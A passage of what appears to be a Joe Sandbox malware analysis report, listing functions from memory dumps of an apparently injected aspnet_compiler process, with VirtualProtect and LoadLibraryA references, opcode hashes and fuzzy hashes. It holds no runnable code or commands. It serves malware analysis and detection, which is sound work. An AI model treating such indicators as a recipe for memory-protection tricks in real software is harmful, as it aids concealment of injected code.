Opcode ID: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction ID: 8433790d5794777ed8f47f5b2abea4579be492c954e6160119d79864bdfdcc13
Opcode Fuzzy Hash: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
Instruction Fuzzy Hash: 6E31753170CA0C4BDB98AA18AC467E973DDE7D5720F00016EE85FD71C9DD71DD0A8691

Function 0000016985B2E373 Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 0000016985B2E380
VirtualProtect.KERNEL32(?,?,-00000001,00000001,-00000001,00000001,-00000001,0000016985B2F5AE), ref: 0000016985B2E3A9
VirtualProtect.KERNEL32 ref: 0000016985B2E3EE
VirtualProtect.KERNEL32 ref: 0000016985B2E412

Memory Dump Source

Source File: 00000004.00000002.3382363801.0000016985AF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016985AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16985af0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction ID: 4cfa90ab85549cf6ce59fec649c24d5e77a79bda7abcd18b72007d04e72fbd33
Opcode Fuzzy Hash: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
Instruction Fuzzy Hash: 6D215E3170CA084BDB98AA5CBC563A973D9E7D9720F10016AEC4FD72CADD35DD0A8691

Function 0000016985B30BB4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0000016985B30C82

Strings

l, xrefs: 0000016985B30C1C

Memory Dump Source

Source File: 00000004.00000002.3382363801.0000016985AF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016985AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16985af0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction ID: 6f8978d89534259c4eefcccede079116aa703b881e5f2dcf5352844ea7bb4126
Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction Fuzzy Hash: FA319E30518A8D4FE795DB2CC444BA6BBD8FFAA308F2456AD80CAC71A6D731D84A8701

Function 0000016985B2E430 Relevance: 3.1, APIs: 2, Instructions: 63
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000016985B30BB4: LoadLibraryA.KERNEL32 ref: 0000016985B30C82

VirtualProtect.KERNEL32 ref: 0000016985B2E47E
VirtualProtect.KERNEL32 ref: 0000016985B2E4A6

Memory Dump Source

Source File: 00000004.00000002.3382363801.0000016985AF0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000016985AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_16985af0000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction ID: 4f183ac0a79e6d7e1ed7ad2765646e2de5b7152b3b18d111bdedc9553ed499fb
Opcode Fuzzy Hash: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
Instruction Fuzzy Hash: 1B118231718A0C4BDB94EB1998956EA73E9FBD9310F40056AAC4AC7289DE31DD458781

Function 00007FFD349703A8 Relevance: 2.7, Strings: 2, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?A_I, xrefs: 00007FFD34970444
#DA_^, xrefs: 00007FFD3497048F

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: ?A_I$#DA_^
API String ID: 0-2859014958
Opcode ID: 1c7a30cb96d436d166e779903c0a55417c05f212904b51569e3ca813c6a149d4
Instruction ID: 2130c65f2335a1731406bf6e588a9be77d55812fe62cb788188f0b50ce9b3e1d
Opcode Fuzzy Hash: 1c7a30cb96d436d166e779903c0a55417c05f212904b51569e3ca813c6a149d4
Instruction Fuzzy Hash: D661F493F4E6820BE765526C68661786ED1EF93224F0A40FFD188DB2DBEC1CEC069351

Function 00007FFD3497A970 Relevance: 1.5, Strings: 1, Instructions: 246
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{0, xrefs: 00007FFD3497AA95

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: {0
API String ID: 0-237175821
Opcode ID: 87e29bccd61836db6f1c01497fd5e1cb09923f95072b70e8060f3d7a25ae3875
Instruction ID: 3b76da33f8c2602fd7eb9c667d6dd4cbe72bf970905792595e1ecd7e22a2bada
Opcode Fuzzy Hash: 87e29bccd61836db6f1c01497fd5e1cb09923f95072b70e8060f3d7a25ae3875
Instruction Fuzzy Hash: 77715471E08A1D4FDB64DB9CD8916EDBBE0FF49360F0441BED44DE7296CA2AAC018790

Function 00007FFD3498C079 Relevance: 1.5, Strings: 1, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

|?_H, xrefs: 00007FFD3498C273

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: |?_H
API String ID: 0-1790896812
Opcode ID: 2924e681fcaf7b14a35ae7dc8d3ed95a1b0f9847aab532fea170a3bc1846f688
Instruction ID: 26471cc45063dad2414d8b9ecc54c5b8055d3a6adddd0c3ea6d823a15e6b12cf
Opcode Fuzzy Hash: 2924e681fcaf7b14a35ae7dc8d3ed95a1b0f9847aab532fea170a3bc1846f688
Instruction Fuzzy Hash: CB812671B18A464FD798EB6CD0A6669B7E1FF96304F2441BED14EC72A6CE39E801C740

Function 00007FFD3497D703 Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

c6, xrefs: 00007FFD3497D8D8

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: c6
API String ID: 0-1700477281
Opcode ID: 6426422a0e64dcdb770807127e1798951c944b2618bf1d5eeda27578314f7799
Instruction ID: 6283527cb73f66cc87f66876060b1f0929e154a4b2f9d45ba78285e4c6d9b976
Opcode Fuzzy Hash: 6426422a0e64dcdb770807127e1798951c944b2618bf1d5eeda27578314f7799
Instruction Fuzzy Hash: 8F81927190D3C64FD33A871088A22E53FE19F83300F0586BED98DCB197DA2C555A97A1

Function 00007FFD3497A951 Relevance: 1.5, Strings: 1, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{0, xrefs: 00007FFD3497AA95

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: {0
API String ID: 0-237175821
Opcode ID: 85b1128ea288724839018e88da70536cfb3f05a1b7c9bf188339ac387234066b
Instruction ID: 5f8093c9e4579147a9a6b07c50ea9c76397184de66716e7c3899d594187ec4ad
Opcode Fuzzy Hash: 85b1128ea288724839018e88da70536cfb3f05a1b7c9bf188339ac387234066b
Instruction Fuzzy Hash: BE616871E08A594FDB54DF5CC8A17ADBBE1FF4A310F0481BED44DE7296CA29AC018790

Function 00007FFD3497D7F1 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

c6, xrefs: 00007FFD3497D8D8

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: c6
API String ID: 0-1700477281
Opcode ID: 62c63f9c1f45cf127a84c5aa1f2019d0b22e7b73831e83ec87b68084bda409ae
Instruction ID: b445efc413a1934aca31c81b31070b90dd6653b0d09e4844cadb1c7bd596e4ed
Opcode Fuzzy Hash: 62c63f9c1f45cf127a84c5aa1f2019d0b22e7b73831e83ec87b68084bda409ae
Instruction Fuzzy Hash: 8151903490D3C64FD32A971088922E63FE1AF43340F0587BED98DCB1A7DA2C951A97A1

Function 00007FFD349831EC Relevance: 1.4, Strings: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H, xrefs: 00007FFD34983311

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 33d61e6859ec74d75bf437d42b1de404435d24fcc2a6f4ae9a827ac9e57500c9
Instruction ID: 18bb32fe51e4f8da76a77bdd9d2744b55e3b4fbbd47c03a37bc05a86fc10634c
Opcode Fuzzy Hash: 33d61e6859ec74d75bf437d42b1de404435d24fcc2a6f4ae9a827ac9e57500c9
Instruction Fuzzy Hash: 4E31E432B18A455BE7E4DB2CC8A1369B7D2FFD9310F04467ED14DC3296DE2DA8428780

Function 00007FFD3497B1D7 Relevance: 1.3, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

c6, xrefs: 00007FFD3497B250

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: c6
API String ID: 0-1700477281
Opcode ID: 6a7121b78741f947621e58fd94f9d0bfe6112817386cc808685cc48bdcf04741
Instruction ID: 70f1b94afda18629784af1252f12b70821e76a84062692efc2ba0a5f7b9f8da6
Opcode Fuzzy Hash: 6a7121b78741f947621e58fd94f9d0bfe6112817386cc808685cc48bdcf04741
Instruction Fuzzy Hash: 7D11ADB1A24B494BD348EF28C452266FBD4FF89309F40D63ED58BC3A54DB75A4438B81

Function 00007FFD34978286 Relevance: .5, Instructions: 510
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfc986c7c1c51b0eb2fbbe38452a85f270f45423397e32795f29fac66df43fbd
Instruction ID: ebf80919480f0964da77f2ceee1821f9e8f8c16b1c2934be4441913d5c0a9ba9
Opcode Fuzzy Hash: dfc986c7c1c51b0eb2fbbe38452a85f270f45423397e32795f29fac66df43fbd
Instruction Fuzzy Hash: 03F1C972F096464BEAB5D52CA8E527C2BD2EBD7350F5551BEC24CCB29ACC2DAC435310

Function 00007FFD349764B1 Relevance: .5, Instructions: 488COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6296bf5ea63533edf5674a1c46d9b0d462f490b478c791285bfc8c4f09141184
Instruction ID: de627886c219ca560e210af1a3d41c640559171f30069486f9cf48ad331e6e34
Opcode Fuzzy Hash: 6296bf5ea63533edf5674a1c46d9b0d462f490b478c791285bfc8c4f09141184
Instruction Fuzzy Hash: 85E12631B089494FEB58EB28D8A56B97BE1FF9A314F1540BDD14DC72A6CE2DAC428350

Function 00007FFD349746C9 Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eff814f74b6baa0af410aec8ccb06889a056fd567a1a750fb8da77edf0f2613a
Instruction ID: ba9a08d939c647d4f40b17985ab86a0e2752e3530b09b6abc2118bcb51f52940
Opcode Fuzzy Hash: eff814f74b6baa0af410aec8ccb06889a056fd567a1a750fb8da77edf0f2613a
Instruction Fuzzy Hash: 2DD1B730A18A8D8FEB68DF28CC557E97BD1FF55310F04826EE84DC7296DB78A8458781

Function 00007FFD349782BC Relevance: .3, Instructions: 348COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f822c23cd7dfea6b5a0c0626cf667cb810522f1d9e54eed107864e71d98aa32
Instruction ID: 4d3f55c7afdd3c761d5e5ab31dabb37fd101325b18b226916bd236ba03328f48
Opcode Fuzzy Hash: 2f822c23cd7dfea6b5a0c0626cf667cb810522f1d9e54eed107864e71d98aa32
Instruction Fuzzy Hash: 87B1EB72F096450BE665D52868A63783BD2FBD7394F6950BEC14CCB2A6CD3EAC435310

Function 00007FFD349836C8 Relevance: .3, Instructions: 346COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e37152573153caeb0ed2702d1e4d74d9ddc6118cbe0137b1b3dcc9aea9d1300
Instruction ID: 0038baf5e691ba8111872a3e1056d74973a4ccde0af701653b369e88d619b879
Opcode Fuzzy Hash: 4e37152573153caeb0ed2702d1e4d74d9ddc6118cbe0137b1b3dcc9aea9d1300
Instruction Fuzzy Hash: F391D361F185190FE6A8E67CA8A137962C6EFE9725F1401BDE44FD3397EC6CEC024290

Function 00007FFD34975586 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d3c3e9f7ee2c77a645d85b9ce333765bd4eb63ee79c51da20505cadceac648
Instruction ID: 55c59913d9dd394b43150366020cec8528280a759a760fbfcbc6dc67dafc3bd7
Opcode Fuzzy Hash: 67d3c3e9f7ee2c77a645d85b9ce333765bd4eb63ee79c51da20505cadceac648
Instruction Fuzzy Hash: 6DB1C530608A4D8FDBA9DF28C8557E93BD1FF55310F04826EE44DC7696DA38A845CB92

Function 00007FFD3498BB97 Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93a4044485b1335b8d8305ac8f82617480ba1634035fc670cd8a576a69e62aaa
Instruction ID: fb156a17bed3469d0e4057bdcb9c70d46310aad5b9fe0a8d7a17c3ad62578cce
Opcode Fuzzy Hash: 93a4044485b1335b8d8305ac8f82617480ba1634035fc670cd8a576a69e62aaa
Instruction Fuzzy Hash: 47A1B131B18A4A8FD799EBAC80A16B9B3E2FF99304F54407DD10DD7297CE39A841C750

Function 00007FFD349836E0 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b762d885dfc53ccafe74a02062767984f5137f6f32c62939981664e181f18f55
Instruction ID: e08565380ed39b57295b416f63a0fad9868fbb6580c05c6b1008c90ff477a98c
Opcode Fuzzy Hash: b762d885dfc53ccafe74a02062767984f5137f6f32c62939981664e181f18f55
Instruction Fuzzy Hash: 8E71EC32F1C5050BFBA8A65CA4A22B872D1EF8A325F5401BEE14EC32D7DD5DBC435255

Function 00007FFD349868D1 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7de728d5ee62bf7f7ff1840e1b92fd45bacdd3ef3c47e6d27e8b834d1e68f80b
Instruction ID: 41fa4175fd2b2731739944a972e7197f665a8ff7de10244df1620cad951bcb76
Opcode Fuzzy Hash: 7de728d5ee62bf7f7ff1840e1b92fd45bacdd3ef3c47e6d27e8b834d1e68f80b
Instruction Fuzzy Hash: CD610631F1C5094FEBA8DB6C94A66B8B7E1FF5A314F0001BDD48EC7296DD28AC568391

Function 00007FFD349836F8 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60e12200cf3c4e7a8e57bd78e1094f03878b635805a53e61b594ee02bf45754
Instruction ID: 5bd2defd80e49eaadea74d55cf7295d2ddf9841fcc0a4527c423965ca3e6cfa1
Opcode Fuzzy Hash: c60e12200cf3c4e7a8e57bd78e1094f03878b635805a53e61b594ee02bf45754
Instruction Fuzzy Hash: D3610430F1C50D4FEBA8DB6C94966B8B7E1EF5A300F0000BDD58EC7296ED29AC528391

Function 00007FFD34977523 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb7216779ff2b592d8608ea712982407dbce0b737689a0ba01283d933b8e13ae
Instruction ID: 7d6c93b22d08d60a22ceb68265f1469404f3450f0c6dcf790c6d159cbd1be93d
Opcode Fuzzy Hash: eb7216779ff2b592d8608ea712982407dbce0b737689a0ba01283d933b8e13ae
Instruction Fuzzy Hash: D2612232B086451FEB55E7BC98F52EA7BE0EF86318F1440BED149C71A7ED2DA8428351

Function 00007FFD349710E1 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b3a0059620f76a0eeda27c921423286a2c13a69ec315a9a6cdf20bacd684e2
Instruction ID: 9fbf001d3f17b8ce8097281fe80fed3ff83a0bc23d76307a0b1629270e18d862
Opcode Fuzzy Hash: 23b3a0059620f76a0eeda27c921423286a2c13a69ec315a9a6cdf20bacd684e2
Instruction Fuzzy Hash: CC713B30B0D68A4FDB55EB7898A66A9BFE0EF57304F0441BED249C72A3DE2D9801C750

Function 00007FFD34970AD1 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7cd9c1ca77f30c214c943512d9330a144da57f9ba8cb767b8bb902a805ef5a
Instruction ID: 575c4f640278150a6b4a9a002e365b06c21b055ce9347a10ca7c1d8aa8ed62fb
Opcode Fuzzy Hash: 6e7cd9c1ca77f30c214c943512d9330a144da57f9ba8cb767b8bb902a805ef5a
Instruction Fuzzy Hash: E9810B7061A3865FE71DCE34A8A66A97FE0DB6335CB2911DDC1C4CF2B3C55A9602D720

Function 00007FFD3498A792 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c03aff63855c01568f9add4f4b1e85de21534504771a99a875cb938e5c7b3bc0
Instruction ID: b5fd2885b85c7ea35de60d43225fff5acbead38236d05ad5d948ad57f20a2b86
Opcode Fuzzy Hash: c03aff63855c01568f9add4f4b1e85de21534504771a99a875cb938e5c7b3bc0
Instruction Fuzzy Hash: 8C81C270A0D6898FD7A6C72898657E4BBB1EF83310F0540FBC14CD7192CA7C5986DB61

Function 00007FFD3499AD80 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96e0a905a38e9b0ef4a7d454fe8739642d9dd7bc036e22cf40a5cb276df94e34
Instruction ID: 70f3ddd23c40a78ba8d79576b179d3c2dd997047f4b641738baa039fb5631d61
Opcode Fuzzy Hash: 96e0a905a38e9b0ef4a7d454fe8739642d9dd7bc036e22cf40a5cb276df94e34
Instruction Fuzzy Hash: 85513862F1C6960FEBA89AAC50E427A77C0EF5A324F05117ED5CFC3286DD2CAC024390

Function 00007FFD3497ADE9 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70ff6612a64db3e67ef5acc55e2db24cd230c4e325fa9072f7f68df8b095967b
Instruction ID: 7428fb86ccf8f482dc6d74909e6cc13abc3794ea85473dbe705d2a7362159c0d
Opcode Fuzzy Hash: 70ff6612a64db3e67ef5acc55e2db24cd230c4e325fa9072f7f68df8b095967b
Instruction Fuzzy Hash: 73514B21F1D2810BE76952387CA62B57FD0EF43328F2450BED9DAC2597EC0E58578396

Function 00007FFD34999578 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57e62dff35681e08ace3acb7aa1a7bc99e4bf27411835be8aba7027aa8e27bff
Instruction ID: 03b9ad7a2590703ce89d851b9973d82f6d4524712ac605cf3d4ca34a6d15d796
Opcode Fuzzy Hash: 57e62dff35681e08ace3acb7aa1a7bc99e4bf27411835be8aba7027aa8e27bff
Instruction Fuzzy Hash: 53510871E186495FE76CDB6CE49617DB7E4EF86310F14413EE08AD3252EE35A8434B81

Function 00007FFD34983740 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0a20e0cec26522670c7aa02a4c222993b5f6accc531d7582dd7f532be51ec1
Instruction ID: 6c4cae8354a2b28630ad82244134cb74ca46c9d760b69fffd007e36fea4db78c
Opcode Fuzzy Hash: 0c0a20e0cec26522670c7aa02a4c222993b5f6accc531d7582dd7f532be51ec1
Instruction Fuzzy Hash: 7851A532F1C6290BE6A8896DACD157A73D2EB9A720F21167DD1CFC3646D92DF8434290

Function 00007FFD34978648 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a52e8f4f4e70ae5d346e5d85546b7aa85f7e30ccc48452641998520cb3e1e0e
Instruction ID: 9b418fdd5bd39add93c19e8faf8b2d36ce91a46c5aa3b7dc51b4e955c5e8bb3e
Opcode Fuzzy Hash: 9a52e8f4f4e70ae5d346e5d85546b7aa85f7e30ccc48452641998520cb3e1e0e
Instruction Fuzzy Hash: 40510A72F099420BEA65D52C68A53BC2BD2EBD7254F2850BEC14DCB296DD2EAC035310

Function 00007FFD349720BC Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03227bd8124785545943c7b176f8083f93f92fea5fdbdc7f14e3bb873feb2ef5
Instruction ID: b2a87a9ce9d0530fc01fe6e2c38a286d0a7e7581f578b2c6a5f4e3bb33f84a28
Opcode Fuzzy Hash: 03227bd8124785545943c7b176f8083f93f92fea5fdbdc7f14e3bb873feb2ef5
Instruction Fuzzy Hash: 44519530918A1C4FDB68DF58D855BE9BBF1FF59310F0082AAD04DE3252DE34A9858F81

Function 00007FFD34977580 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8b3a8da7c8307bf0db26b4ba65e1287a24004744a80da11ba251f5dd8cb9e0f
Instruction ID: 82d43d375c36058d04ae7c2f679593f29df5c051090e5367ec1f4d1409c3b702
Opcode Fuzzy Hash: e8b3a8da7c8307bf0db26b4ba65e1287a24004744a80da11ba251f5dd8cb9e0f
Instruction Fuzzy Hash: 54510331F086465FEB64AB788CF52A97BE1EF56304F1440BED109C7297DE2DA8419741

Function 00007FFD349774A0 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3392047969.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd34970000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cf2d66941f0c071679c39f32381d520efa2540bb91f6148d826d1ec1e537402
Instruction ID: cfb38109a9168bf0f82520b5d7d2ac55ef20d117e707e1fa7dd06cda84b93b80
Opcode Fuzzy Hash: 9cf2d66941f0c071679c39f32381d520efa2540bb91f6148d826d1ec1e537402
